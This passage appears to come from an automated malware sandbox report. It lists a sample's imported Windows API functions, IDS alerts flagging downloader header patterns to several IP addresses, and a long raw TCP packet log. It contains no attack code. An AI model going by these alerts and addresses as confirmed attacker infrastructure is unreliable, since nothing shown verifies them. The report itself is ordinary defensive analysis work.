                                                                                                                                                                                  ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                                                                                  ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                                                                                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                                                                  USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                                                                                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                                                                                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                  2024-12-16T18:28:44.726551+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449736172.217.19.174443TCP
                                                                                                                                                                                  2024-12-16T18:28:52.347535+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738158.101.44.24280TCP
                                                                                                                                                                                  2024-12-16T18:28:55.285176+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738158.101.44.24280TCP
                                                                                                                                                                                  2024-12-16T18:28:56.968822+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449740104.21.67.152443TCP
                                                                                                                                                                                  2024-12-16T18:28:58.363210+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449742158.101.44.24280TCP
                                                                                                                                                                                  2024-12-16T18:29:13.174013+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449781104.21.67.152443TCP

                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Dec 16, 2024 18:28:42.098860979 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 16, 2024 18:28:42.098908901 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:42.099065065 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 16, 2024 18:28:42.109729052 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 16, 2024 18:28:42.109744072 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:43.807100058 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:43.807225943 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 16, 2024 18:28:43.807866096 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:43.807929993 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 16, 2024 18:28:43.853358030 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 16, 2024 18:28:43.853374004 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:43.853594065 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:43.853647947 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 16, 2024 18:28:43.857065916 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 16, 2024 18:28:43.903320074 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:44.726521015 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:44.726602077 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 16, 2024 18:28:44.726617098 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:44.726664066 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 16, 2024 18:28:44.726811886 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 16, 2024 18:28:44.726835966 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:44.726885080 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 16, 2024 18:28:44.879934072 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:44.880033016 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:44.880166054 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:44.880470037 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:44.880500078 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:46.578030109 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:46.578165054 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:46.582654953 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:46.582684040 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:46.582962036 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:46.583034039 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:46.583388090 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:46.631336927 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.392467022 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.392709970 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.405150890 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.405373096 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.432411909 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.432548046 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.512567997 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.512715101 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.513799906 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.513928890 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.583929062 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.584028959 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.587526083 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.587637901 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.587671041 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.587738991 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.592969894 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.593045950 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.600295067 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.600351095 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.601514101 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.601598024 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.608911991 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.609011889 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.613214016 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.613292933 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.617553949 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.617620945 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.626780987 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.627166986 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.630506992 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.630579948 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.641366959 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.641470909 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.644814014 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.644891024 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.653943062 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.654047966 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.657449007 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.657514095 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.667726040 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.667831898 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.671133995 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.671199083 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.681277990 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.681349039 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.684777021 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.684844017 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.694988012 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.695210934 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.696930885 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.697000027 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.708509922 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.708612919 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.708647013 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.708718061 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.728904009 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.729079962 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.746567965 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.746731997 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.746752024 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.746819019 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.775552034 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.775753021 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.775785923 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.775855064 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.778290033 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.778362989 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.778486013 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.778553963 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.783144951 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.783215046 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.786133051 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.786240101 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.786334038 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.786401033 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.797349930 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.797456980 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.797470093 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.797614098 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.797627926 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.797693968 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.807565928 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.807693005 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.807723045 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.807868004 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.818173885 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.818294048 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.818383932 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.818532944 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.828568935 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.828774929 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.828804970 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.828977108 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.839087009 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.839179993 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.839199066 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.839348078 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.848740101 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.848829031 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.848843098 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.849001884 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.858676910 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.858767986 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.858802080 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.859011889 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.869096041 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.869286060 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.869299889 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.869365931 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.878739119 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.878815889 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.878870010 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.879020929 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.888700008 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.888792992 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.888830900 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.889004946 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.898078918 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.898160934 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.898175001 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.898231030 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.907591105 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.907689095 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.907730103 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.908010006 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.915566921 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.915671110 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.915688038 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.915751934 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.915765047 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.915827036 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.917074919 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.917144060 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.923978090 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.924067020 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.925266027 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.925332069 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.932444096 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.932543993 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.933449030 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.933516026 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.938790083 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.938882113 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.939946890 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.940025091 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.949067116 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.949176073 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.950273037 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.950345039 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.950802088 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.950869083 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.953555107 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.953625917 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.957182884 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.957257986 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.958197117 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.958261967 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.963541031 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.963649988 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.966872931 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.966943979 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.969403028 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.969552040 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.970566034 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.970635891 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.974993944 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.975095987 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.975883961 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.975954056 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.979856968 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.979942083 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.981209993 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.981290102 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.985275030 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.985380888 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.986632109 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.986702919 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.990243912 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.990323067 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.990391016 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.990456104 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.995520115 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.995670080 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.995779991 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.995840073 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.000560999 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.000633001 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.000658035 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.000710011 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.005836010 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.005959034 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.005965948 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.006020069 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.010744095 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.010822058 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.010854006 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.010912895 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.015788078 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.015852928 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.015996933 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.016238928 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.020662069 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.020745039 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.020776987 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.020838976 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.025744915 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.025804996 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.025829077 CET44349737142.250.181.1192.168.2.4
